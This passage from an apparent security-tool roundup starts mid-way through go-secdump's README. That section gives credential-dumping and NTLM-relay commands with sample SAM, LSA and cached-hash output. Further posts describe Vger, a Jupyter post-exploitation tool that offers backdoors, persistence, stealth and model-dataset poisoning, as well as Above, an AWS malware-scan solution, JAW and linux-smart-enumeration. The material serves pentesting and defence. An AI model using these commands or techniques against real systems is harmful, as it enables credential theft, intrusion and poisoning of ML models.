./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

NTLM Relaying

Dump registry secrets using NTLM relaying

Start listener

./go-secdump --host 192.168.0.100 -n --relay

Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.

YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5

Name: Guest
RID: 501
NT: <empty>

Name: DefaultAccount
RID: 503
NT: <empty>

Name: WDAGUtilityAccount
RID: 504
NT: <empty>

[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)
DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
...

SOCKS Proxy

Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.

When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.

./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
...

./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080


Above - Invisible Network Protocol Sniffer

By: Zion3R


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + ะก

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

By: Zion3R

V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

User Stories

  • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
  • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
  • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
  • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

Usage

Initial Setup

  1. pip install vger
  2. vger --help

Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

Commands

Once a connection is established, users drop into a nested set of menus.

The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

Experimental

With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

Examples



Drs-Malware-Scan - Perform File-Based Malware Scan On Your On-Prem Servers With AWS

By: Zion3R


Perform malware scan analysis of on-prem servers using AWS services

Challenges with on-premises malware detection

It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.

Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.


How to use AWS services to address these challenges

The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.

This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.

  • AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.

  • Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.

  • AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.

Architecture

Solution description

The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.

  1. AWS DRS is replicating source servers from the on-premises environment to AWS (or from any cloud provider for that matter). For further details about setting up AWS DRS please follow the Quick Start Guide.
  2. Amazon GuardDuty is already enabled.
  3. AWS Security Hub is already enabled.
  4. The Malware Scan solution is triggered by a Schedule Rule in Amazon EventBridge (with prefix DrsMalwareScanStack-ScheduleScanRule). You can adjust the scan frequency as needed (i.e. once a day, a week, etc).
  5. The Schedule Rule in Amazon EventBridge triggers the Submit Orders lambda function (with prefix DrsMalwareScanStack-SubmitOrders) which gathers the source servers to scan from the Source Servers DynamoDB table.
  6. Orders are placed on the SQS FIFO queue named Scan Orders (with prefix DrsMalwareScanStack-ScanOrdersfifo). The queue is used to serialize scan requests mapped to the same DRS instance, preventing a race condition.
  7. The Process Order lambda picks a malware scan order from the queue and enriches it, preparing the upcoming malware scan operation. For instance, it inserts the id of the replicating DRS instance associated to the DRS source server provided in the order. The output of Process Order are malware scan commands containing all the necessary information to invoke GuardDuty malware scan.
  8. Malware scan operations are tracked using the DRSVolumeAnnotationsDDBTable at the volume-level, providing reporting capabilities.
  9. Malware scan commands are inserted in the Scan Commands SQS FIFO queue (with prefix DrsMalwareScanStack-ScanCommandsfifo) to increase resiliency.
  10. The Process Commands function submits queued scan commands at a maximum rate of 1 command per second to avoid API throttling. It triggers the on-demand malware scan function provided by Amazon GuardDuty.
  11. The execution of the on-demand Amazon GuardDuty Malware job can be monitored from the Amazon GuardDuty service.
  12. The outcome of malware scan job is routed to Amazon Cloudwath Logs.
  13. The Subscription Filter lambda function receives the outcome of the scan and tracks the result using DynamoDB (step #14).
  14. The DRS Instance Annotations DynamoDB Table tracks the status of the malware scan job at the instance level.
  15. The CDK stack named ScanReportStack deploys the Scan Report lambda function (with prefix ScanReportStack-ScanReport) to populate the Amazon S3 bucket with prefix scanreportstack-scanreportbucket.
  16. AWS Security Hub aggregates and correlates findings from Amazon GuardDuty.
  17. The Security Hub finding event is caught by an EventBridge Rule (with prefix DrsMalwareScanStack-SecurityHubAnnotationsRule)
  18. The Security Hub Annotations lambda function (with prefix DrsMalwareScanStack-SecurityHubAnnotation) generates additional Notes (Annotations) to the Finding with contextualized information about the source server being affected. This additional information can be seen in the Notes section within the Security Hub Finding.
  19. The follow-up activities will depend on the incident response process being adopted. For example based on the date of the infection, AWS DRS can be used to perform a point in time recovery using a snapshot previous to the date of the malware infection.
  20. In a Multi-Account scenario, this solution can be deployed directly on the AWS account hosting the AWS DRS solution. The Amazon GuardDuty findings will be automatically sent to the centralized Security Account.

Usage

Pre-requisites

  • An AWS Account.
  • Amazon Elastic Disaster Recovery (DRS) configured, with at least 1 server source in sync. If not, please check this documentation. The Replication Configuration must consider EBS encryption using Custom Managed Key (CMK) from AWS Key Management Service (AWS KMS). Amazon GuardDuty Malware Protection does not support default AWS managed key for EBS.
  • IAM Privileges to deploy the components of this solution.
  • Amazon GuardDuty enabled. If not, please check this documentation
  • Amazon Security Hub enabled. If not, please check this documentation

    Warning
    Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.

Deploy

  1. Create a Cloud9 environment with Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16 which is not longer supported since 2023-09-11 git clone https://github.com/aws-samples/drs-malware-scan

    cd drs-malware-scan

    sh check_loggroup.sh

  2. Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment

    npm install cdk bootstrap cdk deploy --all Note
    The solution is made of 2 stacks: * DrsMalwareScanStack: it deploys all resources needed for malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
    * ScanReportStack: it deploys the resources needed for reporting (Amazon Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack

    If you want to deploy both stacks you can run cdk deploy --all

Troubleshooting

All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-* pattern.

The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.

The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console

The DRS Volume Annotations DynamoDB tables keeps track of the status of each Malware scan operation.

Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan

In order to analize logs from Amazon GuardDuty Malware scan operations, you can check /aws/guardduty/malware-scan-events Amazon Cloudwatch LogGroup. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.

Cleanup

  1. Run the following commands in your terminal:

    cdk destroy --all

  2. (Optional) Delete the CloudWatch log groups associated with Lambda Functions.

AWS Cost Estimation Analysis

For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.

Estimated scenario:

  • 2 Source Servers to replicate (DR) (Total Storage: 100GB - 4 disks)
  • 3 TB Malware Scanned/Month
  • 30 days of EBS snapshot Retention period
  • Daily Malware scans
Monthly Cost Total Cost for 12 Months
171.22 USD 2,054.74 USD

Service Breakdown:

Service Name Description Monthly Cost (USD)
AWS Elastic Disaster Recovery 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period 71.41
Amazon GuardDuty 3 TB Malware Scanned/Month 94.56
Amazon DynamoDB 100MB 1 Read/Second 1 Writes/Second 3.65
AWS Security Hub 1 Account / 100 Security Checks / 1000 Finding Ingested 0.10
AWS EventBridge 1M custom events 1.00
Amazon Cloudwatch 1GB ingested/month 0.50
AWS Lambda 5 ARM Lambda Functions - 128MB / 10secs 0.00
Amazon SQS 2 SQS Fifo 0.00
Total 171.22

Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments is advisable to include Business Support Plan (not considered in the estimation)

Security

See CONTRIBUTING for more information.

Authors



JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

By: Zion3R

An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

Release Notes:


Overview of JAW

The architecture of the JAW is shown below.

Test Inputs

JAW can be used in two distinct ways:

  1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

  2. Web Application Analysis: Analyze a web application by providing a single seed URL.

Data Collection

  • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

HPG Construction

  • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

  • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

Analysis and Outputs

  • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

  • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

  • The outputs will be stored in the same folder as that of input.

Setup

The installation script relies on the following prerequisites: - Latest version of npm package manager (node js) - Any stable version of python 3.x - Python pip package manager

Afterwards, install the necessary dependencies via:

$ ./install.sh

For detailed installation instructions, please see here.

Quick Start

Running the Pipeline

You can run an instance of the pipeline in a background screen via:

$ python3 -m run_pipeline --conf=config.yaml

The CLI provides the following options:

$ python3 -m run_pipeline -h

usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

This script runs the tool pipeline.

optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

Quick Example

For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

Playwright CLI with Foxhound

This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

Puppeteer CLI

To start the crawler, do:

$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

See here for more information.

Selenium CLI

To start the crawler, do:

$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d

Please refer to the documentation of the hpg_crawler here for more information.

Graph Construction

HPG Construction CLI

To generate an HPG for a given (set of) JavaScript file(s), do:

$ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)

HPG Import CLI

To import an HPG inside a neo4j graph database (docker instance), do:

$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h

usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

This script imports a CSV of a property graph into a neo4j docker database.

optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)

HPG Construction and Import CLI (v1)

In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

Specification of Parameters:

  • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
  • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
  • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
  • --hybrid=bool: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
  • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false to exclude (default: request_logs_short.out).
  • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
  • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
  • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

For more information, you can use the help CLI provided with the graph construction API:

$ python3 -m engine.api -h

Security Analysis

The constructed HPG can then be queried using Cypher or the NeoModel ORM.

Running Custom Graph traversals

You should place and run your queries in analyses/<ANALYSIS_NAME>.

Option 1: Using the NeoModel ORM (Deprecated)

You can use the NeoModel ORM to query the HPG. To write a query:

  • (1) Check out the HPG data model and syntax tree.
  • (2) Check out the ORM model for HPGs
  • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_orm  

For more information, please see here.

Option 2: Using Cypher Queries

You can use Cypher to write custom queries. For this:

  • (1) Check out the HPG data model and syntax tree.
  • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_cypher

For more information, please see here.

Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering

Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]

cs_csrf:
enabled: false
# [...]

Step 2. Run an instance of the pipeline with:

$ python3 -m run_pipeline --conf=config.yaml

Hint. You can run multiple instances of the pipeline under different screens:

$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]

To generate parallel configuration files automatically, you may use the generate_config.py script.

How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.

An example output entry is shown below:

[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/, where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

Test Web Application

In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

First, install the dependencies via:

$ cd tests/test-webapp
$ npm install

Then, run the application in a new screen:

$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

Detailed Documentation.

For more information, visit our wiki page here. Below is a table of contents for quick access.

The Web Crawler of JAW

Data Model of Hybrid Property Graphs (HPGs)

Graph Construction

Graph Traversals

Contribution and Code Of Conduct

Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

Academic Publication

If you use the JAW for academic research, we encourage you to cite the following paper:

@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}

Acknowledgements

JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

